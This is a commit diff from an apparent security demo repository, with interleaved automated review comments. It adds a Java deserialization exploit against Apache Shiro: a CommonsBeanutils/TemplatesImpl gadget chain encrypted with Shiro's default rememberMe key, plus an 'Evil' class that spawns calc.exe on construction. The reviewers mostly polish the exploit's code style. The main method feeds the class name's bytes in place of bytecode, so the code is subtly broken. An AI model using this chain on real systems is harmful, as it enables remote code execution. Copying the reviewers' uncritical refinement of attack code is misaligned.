Commit 2f9a637

committed
common
1 parent 61b770e commit 2f9a637

3 files changed

+107
-0
lines changed


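--- a/shiro/shiro-deser/pom.xml
+++ b/shiro/shiro-deser/pom.xml
@@ -62,6 +62,11 @@
 <artifactId>commons-collections4</artifactId>
 <version>4.0</version>
 </dependency>
+<dependency>
+<groupId>org.javassist</groupId>
+<artifactId>javassist</artifactId>
+<version>3.27.0-GA</version>
+</dependency>
 </dependencies>
 
 <build>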
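Review bot: The javassist dependency added in the new `<dependency>` block (new lines 65–69) has no live user in this commit: the only references to `ClassPool`/`CtClass` in the new CommonsBeanutils1Shiro class are commented out, so the build pulls in an extra library for nothing. Either remove this dependency together with the two unused imports in that class, or add a comment in the pom stating why it is retained. The block also carries no `<scope>`, so as written the library ships with the artifact rather than staying confined to this demo.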
Lines changed: 73 additions & 0 deletions
@@ -0,0 +1,73 @@
1+
package summersec.shirodemo.Payload;
2+
3+
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
4+
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
5+
import org.apache.commons.beanutils.BeanComparator;
6+
7+
import java.io.ByteArrayOutputStream;
8+
import java.io.ObjectOutputStream;
9+
import java.lang.reflect.Field;
10+
import java.util.PriorityQueue;
11+
import javassist.ClassPool;
12+
import javassist.CtClass;
13+
import org.apache.shiro.crypto.AesCipherService;
14+
import org.apache.shiro.util.ByteSource;
15+
16+
/**
17+
* @ClassName: CommonsBeanutils1Shiro
18+
* @Description: TODO
19+
* @Author: Summer
20+
* @Date: 2021/5/19 16:23
21+
* @Version: v1.0.0
22+
* @Description: 参考https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
23+
**/
24+
25+
26+
public class CommonsBeanutils1Shiro {
27+
28+
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
29+
Field field = obj.getClass().getDeclaredField(fieldName);
30+
field.setAccessible(true);
31+
field.set(obj, value);
32+
}
33+
34+
public byte[] getPayload(byte[] clazzBytes) throws Exception {
35+
TemplatesImpl obj = new TemplatesImpl();
36+
setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
37+
setFieldValue(obj, "_name", "HelloTemplatesImpl");
38+
setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
39+
40+
final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
41+
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
42+
// stub data for replacement later
43+
queue.add("1");
44+
queue.add("1");
45+
46+
setFieldValue(comparator, "property", "outputProperties");
47+
setFieldValue(queue, "queue", new Object[]{obj, obj});
48+
49+
// ==================
50+
// 生成序列化字符串
51+
ByteArrayOutputStream barr = new ByteArrayOutputStream();
52+
ObjectOutputStream oos = new ObjectOutputStream(barr);
53+
oos.writeObject(queue);
54+
oos.close();
55+
56+
return barr.toByteArray();
57+
}
58+
59+
public static void main(String[] args) throws Exception {
60+
// ClassPool pool = ClassPool.getDefault();
61+
// CtClass clazz = pool.get(Evil.class.getName());
62+
byte[] bytes = Evil.class.getName().getBytes();
63+
byte[] payloads = new CommonsBeanutils1Shiro().getPayload(bytes);
64+
// byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode());
65+
66+
AesCipherService aes = new AesCipherService();
67+
byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
68+
69+
ByteSource ciphertext = aes.encrypt(payloads, key);
70+
System.out.printf(ciphertext.toString());
71+
}
72+
73+
}
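Review bot: `System.out.printf(ciphertext.toString())` on new line 70 passes the ciphertext as the format string, so any `%` in that text would be read as a format specifier and could throw; the idiomatic call is `System.out.println(ciphertext.toString());`. The Base64 literal on line 67 is the fixed default rememberMe cipher key that older Shiro releases shipped with, yet the class-level Javadoc still reads `@Description: TODO` (and repeats the tag); it should state that this demo only applies to a deployment that has kept that default, since an instance configured with its own randomly generated key — which current Shiro releases are meant to do by default — will not decrypt this cookie at all. The serialization on lines 51–54 should also use try-with-resources so the `ObjectOutputStream` is closed if `writeObject` throws.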
Lines changed: 29 additions & 0 deletions
@@ -0,0 +1,29 @@
1+
package summersec.shirodemo.Payload;
2+
3+
import com.sun.org.apache.xalan.internal.xsltc.DOM;
4+
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
5+
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
6+
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
7+
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
8+
/**
9+
* @ClassName: Evil
10+
* @Description: TODO
11+
* @Author: Summer
12+
* @Date: 2021/5/19 16:34
13+
* @Version: v1.0.0
14+
* @Description:
15+
**/
16+
17+
18+
public class Evil extends AbstractTranslet {
19+
@Override
20+
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}
21+
22+
@Override
23+
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
24+
25+
public Evil() throws Exception {
26+
System.out.println("Hello TemplatesImpl");
27+
Runtime.getRuntime().exec("calc.exe");
28+
}
29+
}
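Review bot: The class Javadoc (new lines 8–15) is still `@Description: TODO` with a second, empty `@Description` tag, while all behaviour of the class sits in the constructor on lines 25–28 and both `transform` overrides are empty; a comment such as `/** Demo translet: all behaviour is in the constructor, which launches a process on instantiation; the transform methods are intentionally no-ops. */` would stop readers searching the overrides for logic. The constructor's `throws Exception` is wider than the `IOException` that `Runtime.exec` declares and should be narrowed to `public Evil() throws IOException` (with the matching `java.io.IOException` import). From a detection standpoint the point worth noting in the class comment is that the JVM itself spawns a child process during object construction — that is the behaviour to alert on, not the particular program name.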
